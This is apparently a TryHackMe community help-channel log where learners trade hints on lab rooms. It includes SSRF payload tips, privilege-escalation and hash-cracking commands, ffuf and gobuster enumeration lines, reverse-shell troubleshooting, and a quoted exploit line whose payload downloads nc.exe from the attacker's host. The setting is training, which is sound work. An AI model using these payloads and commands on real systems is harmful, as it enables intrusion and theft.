so I was on the right track but I couldn't figure out the syntax necessary to get to the admin page... just got a valueerror page... is the # you mentioned commenting out the id? I tried dropping || %23 in a few spots thinking that|| but it didn't work
You will only need one %23 and it goes just before the &id. If you have a payload like this: http://site.com:8087/download?server=files-site.com:8087&id=1234 - there isn't much you will need to change if you want to access "/admin" on "localhost". Make sure you include the port number.
We don't help with private rooms here, please contact the room creator
i really thought i tried that lol
thanks for the help
Gave +1 Rep to @pulsar turret
wait whats a private room?
Were you able to solve it? Show me your payload and I may be able to point out where you're going wrong.
so only the creators share them?
Mhm
I'm stuck working now, I'm gonna go back to it later
i thought i tried http://site.com:8087/download?server=$ip_of_target_box:8087%23&id=1234...
but maybe i forgot port like you said
ill look again
Sometimes private rooms are made by teaching institutions/teachers and could be tests so that students don't have the answers available on the web. I think that's why they don't allow help with private rooms here.
what kind of account can create private rooms? has to be biz or edu?
Ahh, I can see where you've made a little mistake, you have the %23 in the right place, all you're missing is the page on the site you're trying to access
Anyone can create. Because i saw some private rooms while playing some ctfs
oh i forgot to edit the start of the link? it was like "/download"..."?server""...
that was prolly it... thanks again
Gave +1 Rep to @pulsar turret
You're trying to access the restricted page that's only available as localhost, so instead of $ip_of_target_box as server, try localhost:8087/supersecretpage
Don't worry, we've all had those moments. I've lost count of the amount of times where i've had just one small parameter or misspelling that's held me up for hours, or just completely overthought something and missed the obvious
Why are null, fin, Xmas scans generally used?
Slight ptsd of when I was studying web dev and I would be making some adjustments then my screen would go completely white after refreshing the page
Only to find that it was a missing semicolon at the end of one of the 300 lines of code
They are generally used to evade something on a network.
What do you think that could be?
guess I worry about the same thing in the case private rooms are asked to be helped with: are they maintained to still be accurate to be finished months or years later? If the tech changes and you use your own kali install and get stuck because it is too linear and progress toward a successful ctf depends on something deprecated in your pentesting setup, or even in an updated attackbox, then you can't move on and complete the cert
I also have another question: will there ever be, or are there any I don't know of yet, proctored rooms in future plans? Proctoring requires extra effort but that would also be a way for THM to make an extra profit I guess
So I'm on the cookie tampering task and the question is encoding the value in base64, I'm copy-pasting the encoded value and getting the answer wrong, is there something else I need to do?
Okay nevermind, I solved the question.
is it just me or do cookies often translate into funny chinese statements after cyberchef's magic does its thing
Good morning, I am doing the "tomghost" room, I got the first flag, I am in the privilege escalation process and I see two files 1) tryhackme.asc 2) credential.pgp, I tried to do an attack with john to get the passphrase of tryhackme with the rockyou dictionary but it doesn't send me anything (I already got the hash with gpg2john), by chance could you give me any suggestion, the command I use is
john hashp -w /usr/share/wordlists/rockyou.txt
okay I checked and I see my error, the correct command is john --wordlist=/usr/share/wordlists/rockyou.txt hashp
in what room
The answer is in the last paragraph of the task. I recommend you refresh the page in case you have entered the answer multiple times.
Got it thank you. I don't see how that question matches the answer well
you are welcome
hi,
i'm doing "memory forensics" room with volatility 3
I would like to read a registry key value. I have the offset but i do not find any way to read or dump it... Any help ?
┌──(kali㉿kali)-[/opt/volatility/volatility3-2.4.1]
└─$ python vol.py -f /home/kali/tryhackme/memory_forensics/Snapshot19.vmem windows.registry.printkey | grep CurrentControlSet
2020-12-27 22:50:31.000000 0xf8a000024010inKeyed \REGISTRY\MACHINE\SYSTEM CurrentControlSet True
no volatility 3 user ?
I used v2 but trying to use the new one (without success for the moment)
What optional argument can the ftp-anon.nse script take?
NMAP
found it using bing -- and have no idea where to find it in the room lol
It's not in the room, you were indeed supposed to search and find out yourself
I am doing the Attacking ICS Plant #1, but I don't get how I get the python scripts from the tryhackme webpage to the VM. Anyone know how to do this?
I am not able to run the scripts provided within the VM
Thank you for your help on this one! I learned a lot just from this one insight
Gave +1 Rep to @pulsar turret
Hey everyone. I am working on Network Services. It's wanting me to figure out the username and I think I need a little hint or direction in that area
We used an SMB share to download an auth key.
I am assuming I need to use that to ssh into the server?
Rescind that ask for help. Looked it up and found someone who had a similar problem and I of course was making the same mistake. Whoopsie. Thank you for whoever was considering a response
Hi all....uhm.... so... "root me" room... I've found the obvious binary which should be used - but the intended way (via gtfobins) is not working (not permitted) - any hints?
Hey, when you say "it's not working", what do you mean? What did you try? What error message are you getting? We can't help if we don't know what you're seeing
Yes, you are absolutely right - I hope it's okay to post the command+output here. I'm running this to escalate as per gtfobins on python, after getting on the box with a revshell: sudo setcap cap_setuid+ep python and it's then (correctly?) asking for a password - which imho it should not, as /usr/bin/python is SUID.
You're using the instructions for Capabilities, not SUID
FFS - thanks so much, i got it now!
Glad to hear it
should've tried harder - I know. when reading is too difficult, it's time for a break
Happens to the best of us, coming back with fresh eyes can really help, and next time you'll know to double-check
+rep @forest drift
Gave +1 Rep to @forest drift
oh
You know that would have been a ghost ping if I wasn't here already
Done!
yea sry. I can ping you again
All good
Guys, I want to talk about the room called VulnNet Internal
It is listed as Easy. Well, is it rated right to be easy? I just finished it but even after going through the walkthrough I don't think it should be qualified as Easy. Appreciate all thoughts.
Someone who solved it, how did you find the room? I don't think that most of the things done there, for Privesc at least, come intuitively.
Hello! Tell me please, who understands. I bind the mac address to the router and the Internet disappears. Why is that?
Hi all
I have question
room The Marketplace
I made a stored xss but the admin cookie doesn't get stolen, my cookie gets stolen
Help pls ^^
whats your payload?
Windows noob here. I'm stuck in Windows Fundamental I, task 7. How do I RDP to the standard user? Is the standard user tryhackmebilly? Can't find the correct name or password.
Hi, I'm looking for a reporting tool that allows me to follow all my findings and exploitation paths. Someone told me about obsidian, is it a good idea? Another idea?
when i do complex chall i find many artefacts/creds but it is difficult to keep a global view (i report to a txt file via VI for the moment)
Hello! I'm in the Upload Vulnerabilities room and I'm currently doing Task 7. Up to this point, I've used gobuster to find the directories on the website, figured out what file extensions the website will take, set up the reverse shell to match what is on my linux machine with the port 9999, changed the MIME type to have the website download the reverse shell using Burpsuite, set up a netcat listener on the previously mentioned port and navigated to the directory where the files are stored. My issue is that when I have netcat listen on the port and I navigate, the page stays blank and the listener isn't picking up anything. Burpsuite is off so no requests are hanging, and I did confirm that the linux ip address matches, so I was wondering if I could have a hint on what I'm doing wrong.
I really like obsidian note, here is a good article and a base of how i am also using it. https://www.trustedsec.com/blog/obsidian-taming-a-collective-consciousness/
Hello I can't solve task 2 in web application risk Anyone help me please?
Share the room link.
It is in Introduction to Offensive Security (in web application risk). The answer, as I expect, should be "Brute force" for the first question and "Cryptographic Failures" for the second question, but the answer format is required to be 10 characters only!!
Can you share the room URL please?
Second answer is correct but the first one is not. Read the whole section again.
https://tryhackme.com/room/introwebapplicationsecurity
He is talking about this room if I'm not wrong.
It is.
The answer to Question 1 is not ten characters long.
The first word in the answer is > 10 characters.
Can you tell me the correct answers?
I have tried several times to make the answer exceed 10 characters, but the result is always wrong and limited to 10 characters.
We are not just giving out answers, rather we guide you to find it on your own
You read the question and found that the scenario falls under the cryptographic failure category. Do the same with the first question.
Thank you
it was my mistake. Finally got the correct answer
hi everyone,
I have all the questions but one for the room named caseB4DM755 - its a Digital Forensics thing.
The question is asking for GPS coordinates supposedly.
but the answer seems to be in the form
********.*** *********.***
that makes no sense to me. I tried entering the co-ordinates in all kinds of ways. What am i missing ?
can you link the room pls
#1114253007098499183 ... it is the new one
ah
thanks
Hello, is anyone here? Can someone take a look at the ssh login password for this one? I don't know what I'm doing wrong but can't seem to ssh into the machine. It's the first task of Networking Services. What's the ssh login/pass??? https://tryhackme.com/room/networkservices
You are not supposed to ssh into that machine, that's why no credentials are provided
You have to follow along and enumerate/exploit the target machine with either the attackbox or your own attacking machine
Ohhhhhh!!! Hahaha Omg are you serious!? Ha sheesh I feel dumb, but that makes total sense if you are just scanning!! Wow thanks!! Just ran the commands and its groovin'
Gave +1 Rep to @left thunder
Hi, getting an issue viewing files in the machine "brainstorm":
230 User logged in.
ftp> dir
229 Entering Extended Passive Mode (|||49273|)
And it freezes and disconnects
EDIT:
connected to the ftp, wrote:
passive off
and it's working.
I seem to have the very wrong idea of what GPS co-ordinates are ... the format suggests DDMMSS.sss but it is not .... I am at a loss and I am guessing it is some sort of specialist thing that I have never been exposed to before. Shame for such a good room. Also when XKCD cannot help ... https://xkcd.com/2170/
Unfortunately that's a private room so we can't access it and help
Ayyy okay, I'll do my best then!
that's just bypassing a restriction that's there for a reason
@ancient elk please don't post rooms that haven't been through the room reviewal process
Okay, noted. Sorry!
Hi guys, im trying the room: 'intelligence tools'
Task 5 says: what is the originating ip address? Defang the ip address.
So the eml file is on this machine. But I don't have any tool to use in that machine to look for headers or something in the eml.
And what do they mean with cyberchef has a defang recipe..
Cheers hami
Nvm i got it thanks
Guys I'm stuck on this question:
Referring to the technique from question 2, what mitigation method suggests using SMS messages as an alternative for its implementation? ( I know it's something to do with Authentication but I'm honestly so stuck )
@white salmon is it 2factor authentication, or no?
Yes, but the answer doesn't fit, I think it's worded differently
multi-factor authentication ?
Omggg it worked lmaoo, thank u so much
Gave +1 Rep to @crisp nimbus
loool np
Hey y'all
I just need a little hint with the "Brute Force Heroes" room on the Potator section
can't figure out the correct syntax and I couldn't find any tutorials of Potator on Youtube
Hey, so im stuck in the forensics room task 1 question 4, i know the command for volatility2, but don't know what it is for volatility3 got any tips?
which room are you in? There are a handful of forensics rooms.
Hey, anyone able to guide me in the right direction? I'm doing the easy room "Startup"; every time I run "put" while in the FTP shell, I get a 553 error.
What are the permissions set on the folder you are trying to copy a file into?
Im no longer on that room, but Im not sure. Ill have to check again.
Hello! I'm currently working on solving the authentication bypass section of TryHackMe. As far as I understand, what I need to do is deal with a login page where already registered users are checked. The idea is to save these registered usernames to a file and then use that file for brute force attacks. When I run the following command, I expect the usernames to be stored in the valid_usernames.txt file:
ffuf -w /usr/share/wordlists/SecLists/Usernames/Names/names.txt -X POST -d "username=FUZZ&email=x&password=x&cpassword=x" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.98.147/customers/signup -mr "username already exists" > valid_usernames.txt
I'm not encountering any errors with this command, but the valid_usernames.txt file remains empty. As a result, I'm unable to proceed with the brute force attack. If anyone has knowledge about this issue, I would appreciate their assistance
if you leave the "> valid_usernames" part, do you see ffuf actually going through the ~10.000 names? There should be a little progress indicator
Yes, I see ffuf going through approximately 10,000 names even without the "> valid_usernames" part. However, it still doesn't output anything to the file, and I can't figure out the reason behind it.
Can you maybe send a screenshot of what it looks like, the command looks okay to me and I tried it earlier and it worked fine
I will try it and send you a screenshot when the machine is available again. Thank you in advance
in the room "Walking an application" question 3 on Task 3 does not explain how or where to find the answer. could someone clarify it?
Hello! I'm in the "Network services" room and I am trapped in the question <<What variant of FTP is running on it? >>
My first impression would be to answer "passive", as it is waiting for the client to make the connection. But this word (and 6 character variants) do not work.
I searched for the "FTP variants" concept, getting no results on what the options are. So I am lost in what I should be looking for. Any hints?
sometimes you have a url that looks like "website.com/images/1.png" which looks like 1.png is in the directory "images" on the webserver. And if the server is misconfigured then you can try manually accessing "website.com/images" and it might show you all the files in said directory, even the ones you aren't supposed to see
its asking for the server software used
oh I see! got it, thank you
Gave +1 Rep to @peak grotto
Hey guys I'm stuck on nmap's "what optional argument can the ftp-anon.nse script take". I read the paragraph several times. Not asking for the answer, just a general direction to be steered in.
Ty
go to the official nmap documentation and read about the script, it's not in the text on thm
Tried that too but I'll read it again, thanks.
Gave +1 Rep to @forest drift
I checked, it's definitely on the page of the script
Is it on chapter 15 nmap Scripting Engine (NSE)?
Nvm got it thank you
Glad you got it
That was really smooth wording! thank you so much
Gave +1 Rep to @peak grotto
use -o output-file -of output-format
you can use -of csv and then isolate the usernames with awk
ffuf -w in-file.txt -X POST [...] -u http://target.example.com/login -o valid_usernames_temp.txt -of csv
awk -F, '{print $1}' valid_usernames_temp.txt > valid_usernames.txt
video + fix if stuck on incorrect line endings or escape/control characters in file #web-fundamentals-path message
hey, doing the One Piece room, can't decode the 3rd and 4th poneglyphs, like something is missing. I can add something to fill but there are multiple possibilities.
nvm it was just concating all of them together, so simple.
Hey people! I'm on the file inclusion room challenges and am a bit confused. By following the paths should we have the knowledge on how to do them or additional rooms are needed ? I've completed the HTTP Web basics, but aside from sending POST requests in the incorporated tool from the room, i haven't done it otherwise. I would prefer a hint'/direction to go on as opposed to straight answers. Thanks!
figured it out
hi! in the Yara room, this task:
Inspect the actual Yara file that flagged file 1. Within this rule, how many strings are there to flag this file?
i'm a bit lost on how to see which file i should be looking at; and am i just dumping it into nano?
Hey, I just started the Nessus Room. Created an account, started the nessus service on the Kali machine, activated with the activation code, started Nessus. Now when I want to follow along the questions of that room, I saw that most of the required buttons in Nessus are greyed-out for some reason. Any ideas?
EDIT: Just saw a popup that Nessus is still compiling. Then I have to wait I guess
Not sure if you still need help. I also needed help with this and looked online yesterday. The person used nano yara/thor-webshells.yar to look into the .yar file so they can search for the strings, which is needed for the answer.
I hope it helps a bit.
thank you! i ended up resorting to a video walk-through bc i'm a hack and a fraud lol. will revisit the room with this info, tyty
Gave +1 Rep to @wooden jetty
I dont think youre a fraud. We all start somewhere. I had to use a video too. I did feel like the question was worded strange to me though! Maybe it was the same for you.
Stuck on https://tryhackme.com/room/windowslocalpersistence - Task 6 - Last Question, not sure why its not working, hint welcomed
Hello, in the Wireshark Packet Operations room (https://tryhackme.com/room/wiresharkpacketoperations) Task 5, final question, it asks me "What is the number of "type A DNS Queries"?". I believe I typed the filter right with dns && dns.qry.type == 1 but I'm getting a 3 digit answer. The answer seems to be 2 digits. Is this a bug or do I need to change the filter?
You should add a response flag as well if I'm not mistaken.
dns.qry.type == 1 is good but you have to add a response flag
So to be complete : dns.qry.type == 1 && dns.flags.response == 1
Oh! That was it!
I'm curious why I need a response flag since I thought I needed to filter any DNS queries with an A type. Would you happen to know or direct me to somewhere where I can find out more?
@elder lagoon
Ah I figured it out. Apparently I forgot there is an answer to responses. Using dns.qry.type == 1 provides both queries and responses.
Exactly! Sorry, didn't see your message
Hi I'm stuck on year of the rabbit, I ||got to the part where I have to turn off JS and did so, however the redirect does not mention a hidden directory at all, it just has me go straight to the page with the video||
First request ||
Host: 10.10.110.248
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close
||
I forward that, then obtain:
||
GET /assets/RickRolled.mp4 HTTP/1.1
Host: 10.10.110.248
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.63 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: /
Referer: http://10.10.110.248/sup3r_s3cret_fl4g/
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Range: bytes=0-
Connection: close
Are you using Burp to intercept the request? Have you looked at || http history after forwarding the request|| ?
Yes and yes
I solved it, || The URLs for the page ended up being slightly different, think 3 instead of e||
Yeah, I remember struggling with it too, you can thank @inland onyx :p
Gave +1 Rep to @inland onyx
anyone available?
Im trying to find this last flag for my task but i cant access the file directory anymore (even though i accessed it just 10 min ago) https://10-10-80-64.p.thmlabs.com/assets/
how websites work - html injection into name field??? not getting it.
how websites work - html injection into name field??? step 5, not getting it.
sorry task 5 not step 5
forget it, i got it finally, lol
https://tryhackme.com/room/velociraptorhp
Task 3, last question:
In the Shell, run the following PowerShell command Get-Date. What was the PowerShell command executed with VQL to retrieve the result?
I should have the right answer, I've checked it every way I know how, but the room isn't taking it.
Answer I've got matches the one walkthrough that I've found.
Note:
On the Subdomain Enumeration task 6 the answer to question "What is the first subdomain discovered?" it's not correct. The first subdomain is not d****.
Blaster machine is not working according to the walkthrough!
In easypeasy, is the 2nd flag encoded in the || hidden/whatever|| bg image? if not can I have a hint, || or is it the outdated nginx? ||
Guys, in the room Blaster is it designed in the way like, we are not allowed to restart the machine?
For testing the persistence
@fleet spire go back and check your nmap scan, you might need to do something slightly different with it
I've tried several, maybe I got it but I don't know what todo with it... help?
so you know the ports starting 655
that will be needed for a later part. Did you check the robots.txt file on the other server
okay if you have the user agent text from that robots.txt, you need to find a site that will be able to crack it as it is an md5 hash
so you are not opening http://ipaddress:65524/robots.txt
there is another webserver on that port. That's why I said about scanning all ports with nmap using -p-
apache
but how was I supposed to know there was gonna be a robots.txt?
the nmap scan wouldnt give it to me i think
was i supposed to run dirb on the specific port?
ok thank you so much ill know better next time
no probs @fleet spire
Also when visiting a web site for the first time. It can be handy to check for robots.txt. As it can be helpful as it will list directories that web crawlers should not index
@fleet spire normally I go to crackstation first and then google if it doesn't work there
crackstation didn't crack it
i tried 10 different hashing websites but then i entered it into google and it found it in an instant
@grave hinge would it be ok if I dm you instead of spam this channel?
It was working fine for me. Where did it go wrong for you?
i did it today a few hrs after you posted.
By running a directory bruteforcing tool
You need to add -p- when you do your nmap scan against the host, otherwise, it will only scan against the top 1000 most popular ports and not the entire 0 to 65535.
yeah i got that
Can anyone help me with a question from the Regular Expression room? I am just stuck on Task 5 last question. Rest all are done.
I'm looking for the answer from the groups section on the mitre website. It's asking how many techniques are attributed to this group? - MITRE ROOM
Also looked up the answer and it's not accepting it? SOS
Never look up the answer
hey im trying to figure out the Agent Sudo room and im up to the part where i can read the contents of ||Agent C txt|| where it says ||the password for Agent J is stored in the picture||. i tried to get the picture's metadata using imagemagick and also extensively checked the picture itself, can anyone point me in the right direction?
Got it, my answer earlier was not working I sat counting them over and over for both groups mentioned and the tool
Hi I am having trouble in task 4 of steel mountain https://tryhackme.com/room/steelmountain
I changed the exploit to match my local ip and port then started a python web server and nc listener before running the exploit using python filename rhosts rport and I get this error:
File "/home/kali/Downloads/39161.py", line 37
vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
^
SyntaxError: (unicode error) 'unicodeescape' codec can't decode bytes in position 2-3: truncated \UXXXXXXXX escape
How do we use "grep" to search for a pattern in multiple files?
please i need help with the vim room
grep -rl {PATTERN}
use python2 not 3
Can't remember the image as it has been some time since I worked on the machine. Have you tried || binwalk || or || steghide||?
can I have a hint? I'm stuck on root in easy peasy
|| I found the swap file ( no idea if it helps ) but i have no idea what tod owith it ||
having a bit of trouble with OWASP Top 10 - 2021 / 4. Insecure Design:
||i've gone through every colour on the most common colours list, and i'm not sure if i'm just not checking enough of them, if capitalization is a problem, or i've done something wrong somewhere...||
edit: ||it was capitalisation.|| the best hint one can have is the act of asking for help...
Hey i finished the room, but yes i was supposed to use binwalk on one pic and steghide on the other
I did see it, didn't check it tho
so the || swapfile || isnt related?
In task 9 of https://tryhackme.com/room/networkservices it is asked which variant of ftp is running, I read the previous task, searched on the web and partially read the IETF document but I don't have a clear idea of what is asked, I tried the obvious answers but it didn't work either
nmap -p 21 -v -sV MACHINE_IP
Thank you very much !
Gave +1 Rep to @fathom dome
Hello, I'm doing Snort Basics, task 9 Rule Structure and I'm not getting the expected output. I suspect my issue is IP ID 35369. I've used the following:
||alert icmp/tcp/udp any any <> any any (msg "Alert"; content:"35369";sid=million; rev=1)
alert icmp/tcp/udp any any <> any any (msg "Alert"; content:"IP ID 35369"; sid=million; rev=1)
alert icmp/tcp/udp any any <> any any (msg "Alert"; id:"35369"; sid=million; rev=1)||
I'm not even sure if I can use the icmp/tcp/udp as multiple tags or single use them individually. From what I understand I should be seeing a log file of sorts but no alert or file has been created.
Can anyone assist?
Hey I am in the STS Credentials - Create Padawan the User but when I try to create the user in Cloudshell it says: An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::255057195418:user/255057195418 is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::255057195418:user/padawan because no identity-based policy allows the iam:CreateUser action
Please help ๐ญ
The rule you've written looks for literal string content. The task is asking to find packets where the ipid field in the ip header is the given value. Look at the hint if you think you need to.
These are rules from my local.rules file. Obviously my syntax is incorrect but which is the more correct route just so I know which direction to go.
I don't know off the top of my head if the / works but per the docs you can use icmp, tcp, udp and ip, and since we know we're looking for the ipid in the ip header what I would do (and I think, what I did) was use ip. Although it was a bit back and I'm not in a spot where I can double check my notes.
e.g. "icmp, udp, tcp are all on top of ip, just use ip"
If the rule actually works I'd call it "correct", but there's a bit of simpler-is-better in play here.
Thank you
@thorn umbra figured out the issue. I learned about a way to test my rules and it kept failing, and even though I used a known good one, it still failed. I realized I was creating the rules in the /etc/snort/snort.conf location instead of the local.rules within the Task-9 folder. With the cmd I found to test my rules, I was able to refine it more. Also, turns out you canNOT do the ICMP/TCP/UDP in a single line, they need to be done with a separate rule for each protocol. Thanks again @.@
Gave +1 Rep to @thorn umbra
Good deal, glad I could help!
im doing the weasel room. ||i understood that this is a wsl and now im in the container. not sure how to get the mount running without knowing the password for the dev-datasci||
hey guys,
i need any hint about how to escalate privileges to root
https://tryhackme.com/room/catpictures2
I got stuck in the flag 3
Hints can be given after the 72 hours.
Or you can read what's already in #1124399302320594944
where i can find rooms
Need help with hacking with powershell
Snort Room: Which snort mode works similar to NIPS mode? Answer Format: ***
This has me stumped
NM. got it. Tried harder
in the Walking an Application room, having trouble finding the directory that the room is referring to
anyone know why it says this unable to connect thing
remove s from https?
i passed it yaya
generally firefox complains about self signed or none verifiable certs if the room uses https which yeah is accurate
as the rooms don't have a connection to the outside internet generally
should i use a double VPN
nope you should definitely not
i already use ISPS on top of my normal VPN
so what should i do bc i already use one
if you try and use the tryhackme vpn over another vpn it has a high chance to cause network issues which makes your exploits not work as intended
which means use only the tryhackme vpn and then switch to your usual one when you are done with tryhackme for the day
so i cant run my own VPN
you technically could, but then all the troubleshooting if things don't work as expected is on you as we can't really debug that kind of stuff
so i have to use OpenVPN
well technically you could keep using the attackbox but that is limited unless you are a subscriber
There is a question in room 'hacking with powershell'
How many cmdlets are installed on the system(only cmdlets, not functions and aliases)?
What will be the answer please??
hello. i dont know but i saw this question asked on this discord multiple times. search "how many cmdlets". maybe you find the answer idk..
@final ocean
Hello! Help me please. Start command "nmap -A -p- (IP address)". It's been an hour now and nothing is happening. I launch nmap in an attack box.
press any key or press the v key while the window is focused
should give you a time status or increase verbosity letting you see what happens
but yeah generally an all ports scan with nmap is gonna take quite a while unless you speed it up with -T4 or -T5
or other speedups
like increased min rate
Ok. Thanks!
Get-Command | Where-Object -Property CommandType -eq Cmdlet | measure
Thanks! I did that and got the answer 9674 but it is showing incorrect. I went through many walkthroughs in which 6638 is correct but in my case it shows incorrect.
Gave +1 Rep to @fathom dome
Hello guys, i have a question about hashing, in a Hashing room i read that usually the format for hashing is: $format$rounds$salt$hash
However i see hashes like these: $2a$06$7yoU3Ng8dHTXphAg913cyO6Bjs3K5lBnwq5FJyA6d01pMSrddr1ZG, $6$GQXVvW4EuM$ehD6jWiMsfNorxy5SINsgdlxmAEl3.yif0/c3NqzGLa0P.S7KRDYjycw5bnYkF5ZtB8wQy8KnskuWQS3Yr1wQ0
Which are in this kind of format $format$??rounds or salt??$hash and i dont understand if second argument is salt or rounds
Format > Rounds > Salt > Hash. I recommend completing this module for a better understanding of cryptography and the hashing function.
https://tryhackme.com/module/cryptography
did you find the coordinates using the exiftool?
well i just tried it and it worked. I just replaced the deg with °
there has to be a space between each number
no you have to get the coords from the letter-image.jpg
no prob
Gave +1 Rep to @wooden merlin
Does anyone have a tiny hint that will nudge me towards initial access in the 'Relevant' room?
I am struggling.
Thanks.
Gave +1 Rep to @lucid junco
If that doesn't work, 139.
Anyone have advice for Flag 2 in the File Inclusion Room challenge? I've updated the cookie setting to "Admin", and have tried every directory traversal method I know, but to no avail
every directory traversal method I know
are you sure?
have a look at the different ways of bypasses, and take a look at what the cookie is actually being used for
How do you find directories on the web server using the GoBuster tool?
Set a target, set a word list and run it.
i did it just says Progress: 0 and nothing else happens
What's your syntax?
gobuster dir -u [IP] -w- <(curl -fskSL bit.ly/dsstorewordlist)
after it says "starting gobuster in directory enumeration mode" then the progress message i showed before
What are you attacking?
a THM machine for a CTF
Show a screenshot please.
Syntax too please.
is the IP being exposed ok?
Yes.
there is a space in your port.
same thing even after removing the space
Also try to download this wordlist instead of passing the curl command as an argument
Try removing the port.
i removed the port same thing ill try to download the wl and see if it runs from that
wget bit.ly/dsstorewordlist
gobuster dir -u http://10.10.9.60 -w dsstorewordlist
"cannot write to "dsstorewordlist" (permission denied)"
i wasnt in root sorry xD
From the screenshot, you're in the /home directory which you don't have permissions to write to. You don't need to run this as root, just change to YOUR home dir (cd ~ or cd /home/kali) and do the wget command
ohhh i didnt know it matter where i actually was in the directory ill try again
same thing still "Progress: 0"
Try rebooting the target machine.
30 til ip
"Error: error on running gobuster: unable to connect to http[IP]: Get "[IP]": context deadline exceeded (Client.Timeout exceeded while awaiting headers) "
even after removing the HTTP and the / It still just goes back to progress:0
Wait a couple minutes for the target machine to start, verify that the web server is actually running on port 80, Run gobuster again
It is.
screenshot
It's the Simple CTF.
Good to know, let me try that real quick.
What's your new target ip?
There's an - after your wordlist flag. Should be -w instead of -w-
I cancelled it and restarted it twice and it worked this time Thank you both @fathom dome and @lucid junco
Gave +1 Rep to @fathom dome
+rep @lucid junco
Gave +1 Rep to @lucid junco
after running NC and changing the IP and port in the reverse shell.php i get an HTML 404 not found error message when I curl it, am I overlooking something?
screenshot
Are you still on simple CTF?
There's no "uploads" directory on that web server. From the gobuster scan you did before you should have found the CMS already.
its not a "uploads" directory its the panels/index directory . "panels" was the hidden directory but once i upload to do the reverse shell i get that error message
Are you sure you're doing this room?
https://tryhackme.com/room/easyctf
Just so that we are on the same page here
you cant have ip that have 0 as number at the end
or 0 at all in ip
?
10.10.98.0
so you are saying that 192.168.0.10 is not a valid IP??? because in shadows experience that is a valid IP in a local home network... but yeah no IPs end with just a 0
no thats not the room im doing
im doing rrootme room
was thinking of the wrong thing
Oh my bad then ... Scrubz said before that's the room you were doing and you confirmed it.
If i remember correctly php5 will not be accepted by the web application. Look for other php extensions in order to bypass the filter.
you sure ? ๐
for php5
that was a problem at first also. php wasnt accepted for me but php5 was allowed to upload
it shows the upload confirmation and it shows the upload in the directory I just cant get the reverse shell